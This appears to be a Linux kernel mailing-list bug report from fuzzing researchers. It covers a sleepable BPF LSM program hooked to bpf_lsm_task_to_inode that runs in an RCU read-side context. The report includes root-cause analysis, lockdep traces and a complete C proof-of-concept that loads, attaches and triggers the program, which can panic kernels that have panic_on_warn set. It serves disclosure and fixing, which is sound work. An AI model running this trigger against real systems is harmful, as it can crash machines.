Our fuzzing discovered an invalid wait context vulnerability in the
Linux kernel's BPF subsystem. The vulnerability occurs when a sleepable
BPF program (`BPF_F_SLEEPABLE`) is attached to an LSM hook that is
invoked from an atomic context, resulting in a conflicting lock state.
Reported-by: Quan Sun <202209...@std.uestc.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
## Root Cause
This vulnerability stems from a conflict between the kernel's lock
context (specifically the RCU read lock in procfs) and the wait
semantics of a "sleepable" BPF LSM program.
When an eBPF program of type `BPF_PROG_TYPE_LSM` with the
`BPF_F_SLEEPABLE` flag is attached to certain kernel hooks such as
`bpf_lsm_task_to_inode`, it runs through the BPF trampoline. For
sleepable programs, the trampoline calls `__bpf_prog_enter_sleepable()`
before entering the main program instructions.
1. **RCU Read-Side Context**: The execution path that reaches the target
LSM hook (`security_task_to_inode`) originates from `pid_revalidate()`
in `fs/proc/base.c`. Crucially, `pid_revalidate()` runs while holding
`rcu_read_lock()`, placing execution in a non-sleepable context under an
RCU read-side critical section.
2. **Sleepable Trampoline Fault Check**: The trampoline's enter
mechanism for a sleepable program calls `__might_fault()`, which
internally invokes `__might_resched()`.
3. **Lockdep Violation**: By entering a sleepable boundary (i.e. a point
that may sleep or reschedule) inside an RCU read-side critical section
(`rcu_read_lock`), the kernel hits a conflicting wait context.
`__might_resched()` first reports `BUG: sleeping function called from
invalid context` (the log shows `RCU nest depth: 2, expected: 0`).
`__might_fault()` then annotates a possible `mmap_lock` acquisition,
which lockdep rejects with `BUG: Invalid wait context`. Both reports
trace back to `__might_fault`, and execution continues after them unless
`panic_on_warn` is set.
### Execution Flow Visualization
```text
Vulnerability Execution Flow
|
|--- 1. bpf(BPF_PROG_LOAD, ...) syscall execution
| |
| -> Load a sleepable BPF_PROG_TYPE_LSM program (with BPF_F_SLEEPABLE flag)
|
|--- 2. bpf(BPF_RAW_TRACEPOINT_OPEN, ...) syscall execution
| |
| -> Attach program to the bpf_lsm_task_to_inode LSM hook
|
|--- 3. Trigger target hook (syscall(SYS_utimensat, ...))
| |
| -> pid_revalidate() (in fs/proc/base.c)
| |
| -> Acquires rcu_read_lock() (entering non-sleepable RCU read-side critical section)
| -> pid_update_inode()
| |
| -> security_task_to_inode()
| |
| -> BPF trampoline executed (bpf_trampoline_...)
| |
| -> __bpf_prog_enter_sleepable()
| |
| -> __might_fault() -> __might_resched()
| -> Kernel debug checks detect sleeping function in non-sleepable context
| -> Triggers BUG: sleeping function called from invalid context
```
## Reproduction Steps
1. **BPF Program Setup**: Prepare an eBPF program of type
`BPF_PROG_TYPE_LSM` with the `BPF_F_SLEEPABLE` flag set (the PoC uses
`prog_flags = 0x5b`, which has the `BPF_F_SLEEPABLE` bit `0x10` set).
Ensure the `attach_btf_id` targets the `bpf_lsm_task_to_inode` hook.
2. **Load and Attach**: Call `bpf(BPF_PROG_LOAD, ...)` to load the
program into the kernel, then call `bpf(BPF_RAW_TRACEPOINT_OPEN, ...)`
to attach it to the LSM hook.
3. **Trigger the Atomic Context**: Use a syscall that triggers a
`/proc/self` state update, such as `syscall(SYS_utimensat, 0,
"/proc/self", NULL, 0)`.
4. **Trigger Warning/BUG**: At this point, the filesystem subsystem
revalidates the PID node metadata inside an RCU read-side section.
During the update, the `security_task_to_inode` BPF hook runs and
invokes the sleepable entry path, triggering kernel debug reports such
as `BUG: sleeping function called from invalid context` and `BUG:
Invalid wait context`. If `panic_on_warn` is enabled, this may escalate
to a kernel panic.
## BUG Report
```text
[ 355.262951][ T9821] BUG: sleeping function called from invalid context at kern5
[ 355.264934][ T9821] in_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 9821, name: poc2
[ 355.266503][ T9821] preempt_count: 0, expected: 0
[ 355.267497][ T9821] RCU nest depth: 2, expected: 0
[ 355.268474][ T9821] 3 locks held by poc2/9821:
[ 355.269352][ T9821] #0: ffffffff8f5cea20 (rcu_read_lock){....}-{1:3}, at: path_init+0xa61/0x1ab0
[ 355.273666][ T9821] #1: ffffffff8f5cea20 (rcu_read_lock){....}-{1:3}, at: pid_revalidate+0x2e/0x2c0
[ 355.275547][ T9821] #2: ffffffff8f5cd998 (rcu_tasks_trace_srcu_struct){....}-{0:0}, at: __bpf_prog_ente0
[ 355.277492][ T9821] CPU: 1 UID: 0 PID: 9821 Comm: poc2 Tainted: G W 7.0.0-rc5-g6f6c794d
[ 355.277517][ T9821] Tainted: [W]=WARN
[ 355.277522][ T9821] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.4
[ 355.277536][ T9821] Call Trace:
[ 355.277554][ T9821] <TASK>
[ 355.277564][ T9821] dump_stack_lvl+0x164/0x1f0
[ 355.277599][ T9821] __might_resched+0x32f/0x540
[ 355.277629][ T9821] __might_fault+0x8b/0x140
[ 355.277649][ T9821] __bpf_prog_enter_sleepable+0x193/0x360
[ 355.277679][ T9821] bpf_trampoline_6442657570+0x5b/0xdf
[ 355.277703][ T9821] security_task_to_inode+0x7d/0x140
[ 355.277724][ T9821] pid_revalidate+0x12f/0x2c0
[ 355.277743][ T9821] lookup_fast+0x399/0x610
[ 355.277773][ T9821] path_lookupat+0x1e1/0xc40
[ 355.277804][ T9821] filename_lookup+0x1e4/0x560
[ 355.277834][ T9821] ? __pfx_filename_lookup+0x10/0x10
[ 355.277871][ T9821] ? __pfx_kfree_link+0x10/0x10
[ 355.277900][ T9821] ? __might_fault+0xc1/0x140
[ 355.277919][ T9821] ? strncpy_from_user+0x1a0/0x2d0
[ 355.277947][ T9821] ? do_getname+0x1aa/0x3a0
[ 355.277972][ T9821] do_utimes_path+0xd9/0x1a0
[ 355.277995][ T9821] ? __pfx_do_utimes_path+0x10/0x10
[ 355.278025][ T9821] do_utimes+0x39/0x110
[ 355.278047][ T9821] __x64_sys_utimensat+0x1a0/0x260
[ 355.278071][ T9821] ? __pfx___x64_sys_utimensat+0x10/0x10
[ 355.278093][ T9821] ? xfd_validate_state+0x67/0x190
[ 355.278127][ T9821] do_syscall_64+0x112/0xf80
[ 355.278148][ T9821] ? clear_bhb_loop+0x40/0x90
[ 355.278171][ T9821] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 355.278189][ T9821] RIP: 0033:0x421f8d
[ 355.278203][ T9821] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 8
[ 355.278219][ T9821] RSP: 002b:00007ffe2516ef38 EFLAGS: 00000202 ORIG_RAX: 0000000000000118
[ 355.278241][ T9821] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000421f8d
[ 355.278252][ T9821] RDX: 0000000000000000 RSI: 0000000000487099 RDI: 0000000000000000
[ 355.278261][ T9821] RBP: 00007ffe2516ef50 R08: 0000000000000003 R09: 0000000000000003
[ 355.278271][ T9821] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe2516f068
[ 355.278281][ T9821] R13: 00007ffe2516f078 R14: 00000000004ae868 R15: 0000000000000001
[ 355.278306][ T9821] </TASK>
[ 355.278314][ T9821]
[ 355.318887][ T9821] =============================
[ 355.319673][ T9821] [ BUG: Invalid wait context ]
[ 355.320436][ T9821] 7.0.0-rc5-g6f6c794d0ff0 #3 Tainted: G W
[ 355.321596][ T9821] -----------------------------
[ 355.322354][ T9821] poc2/9821 is trying to lock:
[ 355.323122][ T9821] ffff8881036d4cc0 (&mm->mmap_lock){++++}-{4:4}, at: __might_fault+0xc1/0x140
[ 355.324811][ T9821] other info that might help us debug this:
[ 355.326246][ T9821] context-{5:5}
[ 355.327170][ T9821] 3 locks held by poc2/9821:
[ 355.328137][ T9821] #0: ffffffff8f5cea20 (rcu_read_lock){....}-{1:3}, at: path_init+0xa61/0x1ab0
[ 355.329954][ T9821] #1: ffffffff8f5cea20 (rcu_read_lock){....}-{1:3}, at: pid_revalidate+0x2e/0x2c0
[ 355.331606][ T9821] #2: ffffffff8f5cd998 (rcu_tasks_trace_srcu_struct){....}-{0:0}, at: __bpf_prog_ente0
[ 355.333392][ T9821] stack backtrace:
[ 355.333976][ T9821] CPU: 1 UID: 0 PID: 9821 Comm: poc2 Tainted: G W 7.0.0-rc5-g6f6c794d
[ 355.334000][ T9821] Tainted: [W]=WARN
[ 355.334005][ T9821] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.4
[ 355.334016][ T9821] Call Trace:
[ 355.334046][ T9821] <TASK>
[ 355.334056][ T9821] dump_stack_lvl+0x10e/0x1f0
[ 355.334078][ T9821] __lock_acquire+0x96e/0x25f0
[ 355.334102][ T9821] lock_acquire+0x1c9/0x370
[ 355.334118][ T9821] ? __might_fault+0xc1/0x140
[ 355.334135][ T9821] ? dump_stack_lvl+0x19b/0x1f0
[ 355.334155][ T9821] ? __might_fault+0xc1/0x140
[ 355.334170][ T9821] __might_fault+0xda/0x140
[ 355.334184][ T9821] ? __might_fault+0xc1/0x140
[ 355.334200][ T9821] __bpf_prog_enter_sleepable+0x193/0x360
[ 355.334225][ T9821] bpf_trampoline_6442657570+0x5b/0xdf
[ 355.334242][ T9821] security_task_to_inode+0x7d/0x140
[ 355.334262][ T9821] pid_revalidate+0x12f/0x2c0
[ 355.334278][ T9821] lookup_fast+0x399/0x610
[ 355.334305][ T9821] path_lookupat+0x1e1/0xc40
[ 355.334331][ T9821] filename_lookup+0x1e4/0x560
[ 355.334359][ T9821] ? __pfx_filename_lookup+0x10/0x10
[ 355.334390][ T9821] ? __pfx_kfree_link+0x10/0x10
[ 355.334417][ T9821] ? __might_fault+0xc1/0x140
[ 355.334433][ T9821] ? strncpy_from_user+0x1a0/0x2d0
[ 355.334460][ T9821] ? do_getname+0x1aa/0x3a0
[ 355.334492][ T9821] do_utimes_path+0xd9/0x1a0
[ 355.334513][ T9821] ? __pfx_do_utimes_path+0x10/0x10
[ 355.334539][ T9821] do_utimes+0x39/0x110
[ 355.334560][ T9821] __x64_sys_utimensat+0x1a0/0x260
[ 355.334582][ T9821] ? __pfx___x64_sys_utimensat+0x10/0x10
[ 355.334603][ T9821] ? xfd_validate_state+0x67/0x190
[ 355.334632][ T9821] do_syscall_64+0x112/0xf80
[ 355.334652][ T9821] ? clear_bhb_loop+0x40/0x90
[ 355.334672][ T9821] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 355.334689][ T9821] RIP: 0033:0x421f8d
[ 355.334704][ T9821] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 8
[ 355.334720][ T9821] RSP: 002b:00007ffe2516ef38 EFLAGS: 00000202 ORIG_RAX: 0000000000000118
[ 355.334735][ T9821] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000421f8d
[ 355.334745][ T9821] RDX: 0000000000000000 RSI: 0000000000487099 RDI: 0000000000000000
[ 355.334755][ T9821] RBP: 00007ffe2516ef50 R08: 0000000000000003 R09: 0000000000000003
[ 355.334765][ T9821] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe2516f068
[ 355.334775][ T9821] R13: 00007ffe2516f078 R14: 00000000004ae868 R15: 0000000000000001
[ 355.334794][ T9821] </TASK>
```
## PoC (`poc.c`)
The following C program demonstrates the vulnerability on the latest
bpf-next (commit 6f6c794d0ff05dab1fa4677f39043de8a6a80da3).
### How BTF_ID is obtained
The PoC uses `BPF_PROG_TYPE_LSM`, so `attach_btf_id` must be the
function BTF ID from the exact running kernel image (the `vmlinux` used
by the VM). In this report, `BTF_ID = 206229` maps to
`bpf_lsm_task_to_inode`.
You can get it with:
```bash
bpftool btf dump file /path/to/vmlinux | grep "FUNC 'bpf_lsm_task_to_inode'"
```
Example output:
```text
[206229] FUNC 'bpf_lsm_task_to_inode' type_id=55362 linkage=static
```
Note: BTF IDs are build-specific. If kernel source/config/compiler
changes, this ID may change and must be re-queried.
```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) \
    *(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
                           (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))

int main(int argc, char **argv)
{
    uint32_t attach_btf_id = 206229; // Default BTF ID for commit 6f6c794d0ff0

    if (argc > 1) {
        attach_btf_id = (uint32_t)atoi(argv[1]);
        printf("[+] Using user-provided attach_btf_id: %u\n", attach_btf_id);
    } else {
        printf("[*] Usage: %s [attach_btf_id]\n", argv[0]);
        printf("[*] To extract BTF ID on target kernel, run:\n");
        printf("[*] bpftool btf dump file /sys/kernel/btf/vmlinux | "
               "grep \"FUNC 'bpf_lsm_task_to_inode'\"\n");
        printf("[*] Using default attach_btf_id: %u\n", attach_btf_id);
    }

    // Syzkaller requires fixed memory mappings for generating payloads
    syscall(__NR_mmap, (void*)0x1ffffffff000ul, 0x1000ul, 0ul,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0ul);
    syscall(__NR_mmap, (void*)0x200000000000ul, 0x1000000ul,
            PROT_WRITE|PROT_READ|PROT_EXEC,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0ul);
    syscall(__NR_mmap, (void*)0x200001000000ul, 0x1000ul, 0ul,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0ul);

    intptr_t res = 0;
    uint64_t r_prog = 0xffffffffffffffff;

    // Set up bpf_attr for BPF_PROG_LOAD
    *(uint32_t*)0x2000000009c0 = 0x1d; // prog_type: BPF_PROG_TYPE_LSM
    *(uint32_t*)0x2000000009c4 = 1; // insn_cnt
    *(uint64_t*)0x2000000009c8 = 0x200000000a80; // insns pointer
    // single bpf instruction (BPF_EXIT)
    *(uint8_t*)0x200000000a80 = 0x95;
    STORE_BY_BITMASK(uint8_t, , 0x200000000a81, 0, 0, 4);
    STORE_BY_BITMASK(uint8_t, , 0x200000000a81, 0, 4, 4);
    *(uint16_t*)0x200000000a82 = 0;
    *(uint32_t*)0x200000000a84 = 0;
    *(uint64_t*)0x2000000009d0 = 0x200000000b00; // license pointer
    memcpy((void*)0x200000000b00, "GPL\000", 4);
    *(uint32_t*)0x2000000009d8 = 0; // log_level
    *(uint32_t*)0x2000000009dc = 0; // log_size
    *(uint64_t*)0x2000000009e0 = 0; // log_buf
    *(uint32_t*)0x2000000009e8 = 0; // kern_version
    *(uint32_t*)0x2000000009ec = 0x5b; // prog_flags (includes BPF_F_SLEEPABLE, 0x10)
    memset((void*)0x2000000009f0, 0, 16); // prog_name
    *(uint32_t*)0x200000000a00 = 0; // prog_ifindex
    *(uint32_t*)0x200000000a04 = 0x1b; // expected_attach_type: BPF_LSM_MAC
    *(uint32_t*)0x200000000a08 = 0; // prog_btf_fd
    *(uint32_t*)0x200000000a0c = 0; // func_info_rec_size
    *(uint64_t*)0x200000000a10 = 0; // func_info
    *(uint32_t*)0x200000000a18 = 0; // func_info_cnt
    *(uint32_t*)0x200000000a1c = 0; // line_info_rec_size
    *(uint64_t*)0x200000000a20 = 0; // line_info
    *(uint32_t*)0x200000000a28 = 0; // line_info_cnt
    *(uint32_t*)0x200000000a2c = attach_btf_id; // attach_btf_id
    *(uint32_t*)0x200000000a30 = 0; // attach_prog_fd
    *(uint32_t*)0x200000000a34 = 0; // core_relo_cnt
    *(uint64_t*)0x200000000a38 = 0; // fd_array
    *(uint64_t*)0x200000000a40 = 0; // core_relos
    *(uint32_t*)0x200000000a48 = 0; // core_relo_rec_size
    *(uint32_t*)0x200000000a4c = 0xfffffffc; // log_true_size
    *(uint32_t*)0x200000000a50 = 0; // prog_token_fd

    printf("[+] Loading BPF Program...\n");
    res = syscall(__NR_bpf, 5ul, 0x2000000009c0ul, 0x94ul); // 5 = BPF_PROG_LOAD
    if (res != -1) {
        printf("[+] Verified: load success, FD: %ld\n", res);
        r_prog = res;
    } else {
        perror("[-] BPF_PROG_LOAD failed");
        return 1;
    }

    // Set up bpf_attr for BPF_RAW_TRACEPOINT_OPEN (Attach target logic)
    *(uint64_t*)0x200000000000 = 0; // name pointer
    *(uint32_t*)0x200000000008 = r_prog; // prog_fd
    printf("[+] Attaching BPF...\n");
    syscall(__NR_bpf, 0x11ul, 0x200000000000ul, 0x10ul); // 0x11 = BPF_RAW_TRACEPOINT_OPEN

    // Trigger logic
    printf("[+] Triggering Bug...\n");
    for (int i = 0; i < 50; i++) {
        syscall(SYS_utimensat, 0, "/proc/self", NULL, 0);
    }
    printf("[+] Executed trigger, waiting to check for lockdep warnings "
           "or panic (if panic_on_warn=1)...\n");
    sleep(2);
    return 0;
}
```
## Kernel Configuration Requirements for Reproduction
The vulnerability can be triggered with the kernel config in the attachment.